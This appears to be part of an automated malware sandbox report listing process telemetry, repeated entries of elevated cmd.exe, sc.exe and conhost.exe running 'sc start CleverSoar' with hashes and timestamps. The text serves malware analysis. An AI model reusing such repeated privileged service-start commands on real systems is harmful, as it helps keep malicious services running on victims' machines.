                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:37
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:38
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                              Imagebase:0x7ff693ab0000
                              File size:496'640 bytes
                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                              Has elevated privileges:true
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:false

                              Target ID:39
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:40
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:41
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:42
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:43
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:44
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:45
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:46
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:47
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:48
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:49
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:50
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:51
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:52
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:53
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:54
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:55
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:56
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:57
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:58
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:59
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:60
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:61
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:62
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:63
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:64
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:65
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:66
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:67
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:68
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:69
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:70
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:71
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:72
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:73
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:74
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:75
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:76
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:77
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:78
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:79
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:80
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:81
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:82
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:83
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:84
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:85
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:86
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:87
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:88
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:89
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:90
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:91
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:92
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:93
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:94
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:95
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:96
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:97
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:98
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:99
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:100
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:101
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:102
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:103
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:104
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:105
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:106
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
